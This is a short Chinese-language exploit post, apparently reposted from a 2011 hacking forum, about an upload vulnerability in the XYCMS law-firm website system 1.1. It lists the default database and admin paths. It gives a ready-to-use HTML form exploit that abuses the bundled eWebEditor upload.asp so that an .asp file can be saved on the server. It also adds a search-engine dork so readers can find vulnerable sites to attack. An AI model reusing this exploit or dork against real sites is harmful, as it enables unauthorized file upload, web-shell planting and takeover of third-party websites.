XYCMS律师事务所建站系统 1.1 上传漏洞

2011-9-5 15:05:47 来源:网络转载 浏览:45
XYCMS律师事务所建站系统 1.1 上传漏洞

by Mr.DzY

源码简介:

XYCMS律师事务所建站系统包含事务所简介、律师风采、新闻中心、服务领域、典型案例、法律咨询、资格认证、联系我们等栏目。

后台功能:
企业信息管理:包括基本信息管理,添加,在线报名信息管理,问答中心信息管理
新闻中心管理:管理新闻信息内容,管理相关分类,添加或者删除
律师风采管理:对律师事务所成员进行管理,可添加,删除等操作

源码下载:
http://www.mycodes.net/25/3951.htm

官方网站:http://www.yuleroom.cn
默认DATA:http://www.test.com/xydata/xycms.mdb
默认后台:http://www.test.com/system/index.asp

exploit:

<form action="http://www.test.com/system/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>


由于种种原因,前几天发布的几个漏洞,都没扔关键字。想想还是扔一个吧。免得大家一直问。

inurl:showlsfc.asp?id


PS:由于在1.0版本中,有牛牛发布了若干个问题,我就不一一说了。
这个是没说的,所以补充下。有点鸡肋,如有雷同,纯粹意外。

(0)
(0)